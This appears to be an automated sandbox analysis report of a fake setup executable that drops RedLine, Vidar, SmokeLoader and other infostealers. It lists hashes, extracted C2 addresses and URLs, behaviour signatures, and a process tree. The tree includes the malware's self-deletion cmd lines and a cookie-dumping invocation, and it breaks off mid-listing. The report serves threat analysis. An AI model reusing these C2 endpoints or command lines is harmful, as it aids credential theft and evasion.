Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    1801s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-07-2021 11:08

General

  • Target

    setup_x86_x64_install - копия (17).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1188
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2892
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2684
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2676
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2484
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2460
            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (17).exe
              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (17).exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:996
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2544
                • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3652
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c arnatic_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:492
                    • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_1.exe
                      arnatic_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2112
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                        6⤵
                          PID:5028
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im arnatic_1.exe /f
                            7⤵
                            • Kills process with taskkill
                            PID:5072
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 6
                            7⤵
                            • Delays execution with timeout.exe
                            PID:5104
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_2.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1536
                      • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_2.exe
                        arnatic_2.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:2356
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_3.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1328
                      • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_3.exe
                        arnatic_3.exe
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:1784
                        • C:\Windows\SysWOW64\rUNdlL32.eXe
                          "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                          6⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:208
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_4.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:504
                      • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_4.exe
                        arnatic_4.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2128
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          PID:1008
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4648
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                            PID:6196
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                              PID:5836
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_5.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3276
                          • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_5.exe
                            arnatic_5.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1308
                            • C:\Users\Admin\AppData\Roaming\6206330.exe
                              "C:\Users\Admin\AppData\Roaming\6206330.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3452
                            • C:\Users\Admin\AppData\Roaming\2167333.exe
                              "C:\Users\Admin\AppData\Roaming\2167333.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4116
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4556
                            • C:\Users\Admin\AppData\Roaming\7017961.exe
                              "C:\Users\Admin\AppData\Roaming\7017961.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4188
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_7.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3244
                          • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_7.exe
                            arnatic_7.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2600
                            • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_7.exe
                              C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_7.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3772
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_6.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3548
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1912
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                      1⤵
                        PID:1408
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                        1⤵
                          PID:1244
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1056
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:912
                            • C:\Users\Admin\AppData\Roaming\irdsfig
                              C:\Users\Admin\AppData\Roaming\irdsfig
                              2⤵
                              • Executes dropped EXE
                              PID:4460
                            • C:\Users\Admin\AppData\Roaming\irdsfig
                              C:\Users\Admin\AppData\Roaming\irdsfig
                              2⤵
                              • Checks SCSI registry key(s)
                              PID:5832
                            • C:\Users\Admin\AppData\Roaming\gtdsfig
                              C:\Users\Admin\AppData\Roaming\gtdsfig
                              2⤵
                              • Checks SCSI registry key(s)
                              PID:6628
                            • C:\Users\Admin\AppData\Roaming\uwdsfig
                              C:\Users\Admin\AppData\Roaming\uwdsfig
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:6028
                              • C:\Users\Admin\AppData\Roaming\uwdsfig
                                C:\Users\Admin\AppData\Roaming\uwdsfig
                                3⤵
                                • Checks SCSI registry key(s)
                                PID:5592
                            • C:\Users\Admin\AppData\Roaming\gtdsfig
                              C:\Users\Admin\AppData\Roaming\gtdsfig
                              2⤵
                              • Checks SCSI registry key(s)
                              PID:5412
                            • C:\Users\Admin\AppData\Roaming\uwdsfig
                              C:\Users\Admin\AppData\Roaming\uwdsfig
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:5476
                              • C:\Users\Admin\AppData\Roaming\uwdsfig
                                C:\Users\Admin\AppData\Roaming\uwdsfig
                                3⤵
                                • Checks SCSI registry key(s)
                                PID:3664
                            • C:\Users\Admin\AppData\Roaming\irdsfig
                              C:\Users\Admin\AppData\Roaming\irdsfig
                              2⤵
                              • Checks SCSI registry key(s)
                              PID:7164
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:340
                            • \??\c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                              1⤵
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1232
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                • Drops file in System32 directory
                                • Checks processor information in registry
                                • Modifies data under HKEY_USERS
                                • Modifies registry class
                                PID:996
                            • C:\Users\Admin\AppData\Local\Temp\7zS0F9540A4\arnatic_6.exe
                              arnatic_6.exe
                              1⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:3420
                              • C:\Users\Admin\Documents\FDV0nL5MzrCJEqLHggd6d6d0.exe
                                "C:\Users\Admin\Documents\FDV0nL5MzrCJEqLHggd6d6d0.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4432
                              • C:\Users\Admin\Documents\4DPqctizkXz_1crholmmWOUT.exe
                                "C:\Users\Admin\Documents\4DPqctizkXz_1crholmmWOUT.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4452
                                • C:\Users\Admin\Documents\4DPqctizkXz_1crholmmWOUT.exe
                                  C:\Users\Admin\Documents\4DPqctizkXz_1crholmmWOUT.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4992
                              • C:\Users\Admin\Documents\cx4LOb7HPGV3ZBucRZvOrIh9.exe
                                "C:\Users\Admin\Documents\cx4LOb7HPGV3ZBucRZvOrIh9.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3276
                                • C:\Users\Admin\Documents\cx4LOb7HPGV3ZBucRZvOrIh9.exe
                                  C:\Users\Admin\Documents\cx4LOb7HPGV3ZBucRZvOrIh9.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1648
                              • C:\Users\Admin\Documents\zS__AuUXUB72ydwPQ6DiV2hD.exe
                                "C:\Users\Admin\Documents\zS__AuUXUB72ydwPQ6DiV2hD.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                PID:4412
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                  3⤵
                                    PID:4156
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      4⤵
                                      • Checks processor information in registry
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4956
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.0.320027567\271089530" -parentBuildID 20200403170909 -prefsHandle 1452 -prefMapHandle 1444 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 1532 gpu
                                        5⤵
                                          PID:4796
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.3.1943743587\509957160" -childID 1 -isForBrowser -prefsHandle 5500 -prefMapHandle 5496 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5512 tab
                                          5⤵
                                            PID:3300
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.13.842808188\1384531591" -childID 2 -isForBrowser -prefsHandle 3512 -prefMapHandle 4884 -prefsLen 7013 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 3504 tab
                                            5⤵
                                              PID:5168
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.20.590676852\374214109" -childID 3 -isForBrowser -prefsHandle 5216 -prefMapHandle 4864 -prefsLen 7941 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5372 tab
                                              5⤵
                                                PID:5940
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                            3⤵
                                            • Enumerates system info in registry
                                            • Suspicious use of FindShellTrayWindow
                                            PID:5928
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff885a74f50,0x7ff885a74f60,0x7ff885a74f70
                                              4⤵
                                                PID:5620
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:8
                                                4⤵
                                                  PID:5096
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
                                                  4⤵
                                                    PID:5816
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1676 /prefetch:2
                                                    4⤵
                                                      PID:1384
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:1
                                                      4⤵
                                                        PID:5352
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
                                                        4⤵
                                                          PID:5320
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                          4⤵
                                                            PID:4376
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
                                                            4⤵
                                                              PID:4328
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
                                                              4⤵
                                                                PID:3980
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
                                                                4⤵
                                                                  PID:5456
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                                                                  4⤵
                                                                    PID:6472
                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                    4⤵
                                                                      PID:6616
                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff668d4a890,0x7ff668d4a8a0,0x7ff668d4a8b0
                                                                        5⤵
                                                                          PID:6676
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:8
                                                                        4⤵
                                                                          PID:6900
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 /prefetch:8
                                                                          4⤵
                                                                            PID:7000
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=768 /prefetch:8
                                                                            4⤵
                                                                              PID:7044
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10759537909969227643,15433627048944599354,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4156 /prefetch:2
                                                                              4⤵
                                                                                PID:6292
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /C taskkill /F /PID 4412 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\zS__AuUXUB72ydwPQ6DiV2hD.exe"
                                                                              3⤵
                                                                                PID:6076
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /PID 4412
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:5260
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /C taskkill /F /PID 4412 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\zS__AuUXUB72ydwPQ6DiV2hD.exe"
                                                                                3⤵
                                                                                  PID:5772
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /PID 4412
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5356
                                                                              • C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe
                                                                                "C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4392
                                                                                • C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe
                                                                                  C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4984
                                                                                • C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe
